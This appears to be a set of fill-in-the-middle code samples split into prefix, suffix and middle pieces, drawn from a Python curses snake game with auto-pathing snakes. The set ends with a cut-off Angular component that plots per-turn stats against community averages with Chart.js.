self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
|
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = d * r
p += d
res.append(d)
break
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise
msg = 'Thanks for playing!'
raise SystemExit('\n'.join(
[str(msg),
# "You ate %s foods" % (len(the_snake.tail) - INITIAL_LENGTH),
# "You moved %s tiles" % the_snake.steps,
"Good job!!"]))
if __name__ == "__main__":
wrapper(main)
| t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w | identifier_body |
pysnake.py | import math
import curses
import random
import asyncio
# from asyncsnake import LockstepConsumers
from asyncsnake import run_coroutines, WaitMap
# from cursessnake import CursesCharacters
from cursessnake import wrapper
class GameOver(Exception):
pass
UP = 0-1j
RIGHT = 1+0j
DOWN = 0+1j
LEFT = -1+0j
INITIAL_LENGTH = 6
class ScreenBase:
COLORS = None
BLANK = ' '
def __init__(self, stdscr):
self.board = {}
self.stdscr = stdscr
self.stdscr.nodelay(1)
curses.curs_set(0)
self._color_id = {k: i
for i, k in enumerate(self.COLORS.keys(), 1)}
for k, c in self.COLORS.items():
curses.init_pair(self._color_id[k], c, curses.COLOR_BLACK)
def addch(self, pos, ch):
i = int(pos.imag)
j = int(pos.real)
self.board[i, j] = ch
self._update(i // 2, j)
assert self.gettile(pos) == ch
def gettile(self, pos):
i = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def wrap_pos(self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = d * r
p += d
res.append(d)
break
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise | raise SystemExit('\n'.join(
[str(msg),
# "You ate %s foods" % (len(the_snake.tail) - INITIAL_LENGTH),
# "You moved %s tiles" % the_snake.steps,
"Good job!!"]))
if __name__ == "__main__":
wrapper(main) | msg = 'Thanks for playing!'
| random_line_split |
pysnake.py | import math
import curses
import random
import asyncio
# from asyncsnake import LockstepConsumers
from asyncsnake import run_coroutines, WaitMap
# from cursessnake import CursesCharacters
from cursessnake import wrapper
class GameOver(Exception):
pass
UP = 0-1j
RIGHT = 1+0j
DOWN = 0+1j
LEFT = -1+0j
INITIAL_LENGTH = 6
class ScreenBase:
COLORS = None
BLANK = ' '
def __init__(self, stdscr):
self.board = {}
self.stdscr = stdscr
self.stdscr.nodelay(1)
curses.curs_set(0)
self._color_id = {k: i
for i, k in enumerate(self.COLORS.keys(), 1)}
for k, c in self.COLORS.items():
curses.init_pair(self._color_id[k], c, curses.COLOR_BLACK)
def addch(self, pos, ch):
i = int(pos.imag)
j = int(pos.real)
self.board[i, j] = ch
self._update(i // 2, j)
assert self.gettile(pos) == ch
def gettile(self, pos):
i = int(pos.imag)
j = int(pos.real)
return self.board.get((i, j), self.BLANK)
def delch(self, pos, ch):
if self.gettile(pos) == ch:
self.addch(pos, self.BLANK)
def _update(self, row, col):
ch1 = self.board.get((2*row, col), self.BLANK)
ch2 = self.board.get((2*row+1, col), self.BLANK)
if ch1 != self.BLANK and ch2 != self.BLANK:
c = '\N{FULL BLOCK}'
elif ch1 != self.BLANK:
c = '\N{UPPER HALF BLOCK}'
elif ch2 != self.BLANK:
c = '\N{LOWER HALF BLOCK}'
else:
c = self.BLANK
color = next(
(i for ch, i in self._color_id.items() if ch in (ch1, ch2)),
0)
self.stdscr.addstr(row, col, c, curses.color_pair(color))
def refresh(self):
self.stdscr.refresh()
class Screen(ScreenBase):
BODY = 'X'
FOOD = 'o'
FASTER = '+'
SLOWER = '-'
COLORS = {BODY: curses.COLOR_BLUE,
FOOD: curses.COLOR_YELLOW,
FASTER: curses.COLOR_GREEN,
SLOWER: curses.COLOR_RED}
class Level:
def __init__(self, stdscr, width=30, height=20):
self.screen = Screen(stdscr)
self.waiters = WaitMap()
self.width, self.height = width, height
self.worm_holes = {
self.random_position(): self.random_position()
for _ in range(3)}
def random_position(self):
return complex(random.randint(0, self.width-1),
random.randint(0, self.height-1))
def is_free(self, pos):
return self.get_tile(pos) == self.screen.BLANK
def random_free_position(self):
p = self.random_position()
while not self.is_free(p):
p = self.random_position()
return p
def random_rect(self, w, h):
max_i = self.height - (h-1)
max_j = self.width - (w-1)
return complex(random.randint(0, max_j-1),
random.randint(0, max_i//2-1)*2)
def free_rect(self, pos, w, h):
return all(self.is_free(pos + i*1j + j)
for i in range(h)
for j in range(w))
def random_free_rect(self, w, h):
pos = self.random_rect(w, h)
while not self.free_rect(pos, w, h):
pos = self.random_rect(w, h)
return pos
def add_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.addch(pos + i + j*1j, ch)
def del_rect(self, pos, ch, w, h):
for i in range(h):
for j in range(w):
self.screen.delch(pos + i + j*1j, ch)
async def food_loop_base(self, ch, fn, w=2, h=2):
while True:
pos = self.random_free_rect(w, h)
self.add_rect(pos, ch, w, h)
self.screen.refresh()
p = await self.wait_for_player_rect(pos, w, h)
self.del_rect(pos, ch, w, h)
fn(p)
def put_player(self, snake, pos):
self.screen.addch(pos, self.screen.BODY)
self.waiters.notify(pos, snake)
def clear_player(self, pos):
self.screen.addch(pos, self.screen.BLANK)
def has_player(self, pos):
return self.get_tile(pos) == self.screen.BODY
def get_tile(self, pos):
return self.screen.gettile(pos)
async def wait_for_player_rect(self, pos, w, h):
futures = [self.waiters.wait(pos + i*1j + j)
for i in range(h)
for j in range(w)]
wait = asyncio.wait(futures, return_when=asyncio.FIRST_COMPLETED)
dones, pending = await wait
for f in pending:
f.cancel()
results = []
for done in dones:
results.append(await done)
return results[0]
def | (self, pos):
pos = self.worm_holes.get(pos, pos)
return complex(pos.real % self.width, pos.imag % self.height)
async def play(self, snakes):
t = 0
n = [0] * len(snakes)
while True:
i = min(range(len(snakes)), key=lambda i: n[i])
if n[i] > t:
self.screen.refresh()
await asyncio.sleep(0.01 * (n[i] - t))
t = n[i]
try:
snakes[i].step()
except GameOver:
for c in snakes[i].tail:
self.screen.addch(c, Screen.BLANK)
# s = max(1, snakes[i].wait-1)
del snakes[i]
if not snakes:
raise
# pos = self.random_free_position()
# snakes.append(AutoSnake(speed=s, pos=pos, length=1))
continue
w = max(1, math.ceil(math.log(len(snakes[i].tail), 2)))
n[i] += w
def main(stdscr):
level = Level(stdscr)
class Snake:
def __init__(self, pos=None, dir=None, controls=None, speed=None, length=None):
self.wait = speed or 10
if pos is None:
self.pos = 0+0j
else:
self.pos = pos
if dir is None:
self.prev_dir = self.next_dir = RIGHT
else:
self.prev_dir = self.next_dir = dir
self.steps = 0
self.tail = [self.pos] * (length or INITIAL_LENGTH)
self.tail_index = 0
if controls is None:
controls = [curses.KEY_UP,
curses.KEY_LEFT,
curses.KEY_DOWN,
curses.KEY_RIGHT]
else:
controls = [ord(c) if isinstance(c, str)
else c for c in controls]
self.controls = controls
async def get_directions(self, it):
async for c in it:
try:
i = self.controls.index(c)
except ValueError:
continue
next_dir = [0-1j, -1+0j, 0+1j, 1+0j][i]
if next_dir == -self.prev_dir:
self.next_dir = 0
else:
self.next_dir = next_dir
def step(self):
if self.next_dir == 0:
return
level.clear_player(self.tail[self.tail_index])
self.pos = level.wrap_pos(self.pos + self.next_dir)
self.prev_dir = self.next_dir
if level.has_player(self.pos):
raise GameOver("Boom! You hit yourself")
self.tail[self.tail_index] = self.pos
level.put_player(self, self.pos)
self.tail_index += 1
self.steps += 1
if self.tail_index == len(self.tail):
self.tail_index = 0
def slower(self):
self.wait = self.wait + 1
def faster(self):
self.wait = max(1, self.wait - 1)
def on_eat_food(self):
self.tail.insert(self.tail_index, self.tail[self.tail_index])
if len(self.tail) == level.width * level.height:
raise GameOver("You win!")
class AutoSnake(Snake):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.route = []
self.route_guard = None
async def get_directions(self, it):
async for c in it:
pass
def route_next(self):
if not self.route:
return
if self.route_guard and not self.route_guard():
return
self.next_dir = self.route.pop()
return True
def reroute(self):
# if self.wait > 1:
# target = Screen.FASTER
# else:
# target = Screen.FOOD
target = Screen.FOOD
res = self.route_to(target)
if res:
target_pos, self.route = res
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return (level.get_tile(next_pos) in (target, Screen.BLANK) and
level.get_tile(target_pos) == target)
self.route_guard = target_pos and guard
else:
self.route = self.compress()
def guard():
next_pos = level.wrap_pos(self.pos + self.route[-1])
return not level.has_player(next_pos)
self.route_guard = guard
def compress(self):
p = self.pos
d = self.prev_dir
res = []
for i in range(min(10, len(self.tail) // 2)):
for r in (1j, 1, -1j):
t = level.wrap_pos(p + d*r)
if not level.has_player(t):
d = d * r
p += d
res.append(d)
break
else:
break
res.reverse()
return res or [0]
def route_to(self, target):
parent = {self.pos: None}
def backtrack(p):
res = []
while parent[p]:
d, p = parent[p]
res.append(d)
return res
n = [self.pos]
i = 0
while i < len(n):
p = n[i]
i += 1
v = level.get_tile(p)
if v == target:
return p, backtrack(p)
elif v != Screen.BLANK and p != self.pos:
continue
for dir in (0-1j, -1+0j, 0+1j, 1+0j):
q = level.wrap_pos(p + dir)
if q not in parent:
parent[q] = (dir, p)
n.append(q)
def step(self):
if not self.route_next():
self.reroute()
self.route_next()
super().step()
# width = 160
# height = 90
# width, height = 30, 20
# width, height = 15, 15
# width, height = 160, 90
def food_loop():
return level.food_loop_base(Screen.FOOD, lambda p: p.on_eat_food())
def faster_loop():
return level.food_loop_base(Screen.FASTER, lambda p: p.faster())
def slower_loop():
return level.food_loop_base(Screen.SLOWER, lambda p: p.slower())
# input = LockstepConsumers()
snakes = [
AutoSnake(speed=4, pos=0+10j),
AutoSnake(speed=4, pos=10+12j),
# AutoSnake(speed=4, pos=15+12j),
# AutoSnake(speed=4, pos=0+16j),
]
tasks = [
# input.consume(CursesCharacters(stdscr)),
food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# food_loop(),
# faster_loop(),
# slower_loop(),
level.play(snakes),
]
# for s in snakes:
# tasks.append(
# s.get_directions(input.consumer()))
try:
msg = str(run_coroutines(tasks))
except GameOver as exn:
msg = exn.args[0]
except KeyboardInterrupt:
raise
msg = 'Thanks for playing!'
raise SystemExit('\n'.join(
[str(msg),
# "You ate %s foods" % (len(the_snake.tail) - INITIAL_LENGTH),
# "You moved %s tiles" % the_snake.steps,
"Good job!!"]))
if __name__ == "__main__":
wrapper(main)
| wrap_pos | identifier_name |
graph-with-comparison-new.component.ts | import {
AfterContentInit,
ChangeDetectionStrategy,
ChangeDetectorRef,
Component,
ElementRef,
Input,
ViewChild,
} from '@angular/core';
import { AbstractSubscriptionStoreComponent } from '@components/abstract-subscription-store.component';
import { AppUiStoreFacadeService } from '@legacy-import/src/lib/js/services/ui-store/app-ui-store-facade.service';
import { ChartData, ChartOptions, TooltipItem } from 'chart.js';
import { BehaviorSubject, combineLatest, filter, Observable, share, takeUntil } from 'rxjs';
import { NumericTurnInfo } from '../../models/battlegrounds/post-match/numeric-turn-info';
@Component({
selector: 'graph-with-comparison-new',
styleUrls: [`../../../css/component/battlegrounds/graph-with-comparison.component.scss`],
template: `
<ng-container
*ngIf="{ lineChartData: lineChartData$ | async, lineChartOptions: lineChartOptions$ | async } as value"
>
<div class="legend">
<div class="item average" [helpTooltip]="communityTooltip">
<div class="node"></div>
{{ communityLabel$ | async }}
</div>
<div
class="item current"
[helpTooltip]="yourTooltip"
*ngIf="value.lineChartData?.datasets[1]?.data?.length"
>
<div class="node"></div>
{{ yourLabel$ | async }}
</div>
</div>
<div class="container-1">
<div style="display: block; position: relative; height: 100%; width: 100%;">
<canvas
*ngIf="value.lineChartData?.datasets[0]?.data?.length"
#chart
baseChart
[data]="value.lineChartData"
[options]="value.lineChartOptions"
[legend]="false"
[type]="'line'"
></canvas>
</div>
</div>
</ng-container>
`,
changeDetection: ChangeDetectionStrategy.OnPush,
})
export class GraphWithComparisonNewComponent extends AbstractSubscriptionStoreComponent implements AfterContentInit {
@ViewChild('chart', { static: false }) chart: ElementRef;
lineChartData$: Observable<ChartData<'line'>>;
lineChartOptions$: Observable<ChartOptions>;
communityLabel$: Observable<string>;
yourLabel$: Observable<string>;
@Input() communityTooltip: string;
@Input() yourTooltip: string;
@Input() turnLabel = 'Turn';
@Input() statLabel = 'Stat';
@Input() deltaLabel: string;
@Input() id: string;
@Input() showDeltaWithPrevious: boolean;
@Input() set maxYValue(value: number) {
this.maxYValue$$.next(value);
}
@Input() set stepSize(value: number) {
this.stepSize$$.next(value);
}
@Input() set showYAxis(value: boolean) {
this.showYAxis$$.next(value);
}
@Input() set communityLabel(value: string) {
this.communityLabel$$.next(value);
}
@Input() set yourLabel(value: string) {
this.yourLabel$$.next(value);
}
@Input() set communityValues(value: readonly NumericTurnInfo[]) {
this.communityValues$$.next(value);
}
@Input() set | (value: readonly NumericTurnInfo[]) {
this.yourValues$$.next(value);
}
private maxYValue$$ = new BehaviorSubject<number>(null);
private stepSize$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
